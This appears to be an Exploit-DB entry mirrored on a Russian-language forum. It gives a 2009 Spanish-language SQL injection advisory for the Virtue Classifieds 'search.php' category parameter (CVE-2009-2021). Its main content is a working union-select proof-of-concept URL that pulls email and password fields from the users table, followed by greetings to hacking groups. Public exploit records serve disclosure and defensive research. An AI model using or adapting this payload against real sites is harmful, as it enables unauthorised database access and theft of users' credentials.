- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 8892
- Проверка EDB
-
- Пройдено
- Автор
- OZX
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2009-2021
- Дата публикации
- 2009-06-08
Код:
#################################################################################################################################################
CMS : Virtue Classifieds
WEB : http://www.virtuenetz.com/classified/
Archivo : search.php
Variable Tipo : GET
Valor : category
Tipo : SQL Injection
Url : http:/www.site.com/search.php?category=[SQLI]
PoC:
http:/www.site.com/search.php?category=2+and+1=0+union+select+all+1,2,concat_ws(0x3A,email,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users--
Gretz :
C1c4tr1z(voodoo-labs.org),Nobody,1995,Lix (arrivalsec.wordpress.com),NanoNRoses,Codebreak(?),Nork And All Friends of Undersecurity.net.
100% CHILE
WWW.UNDERSECURITY.NET
##################################################################################################################################################
# milw0rm.com [2009-06-08]- Источник
- www.exploit-db.com
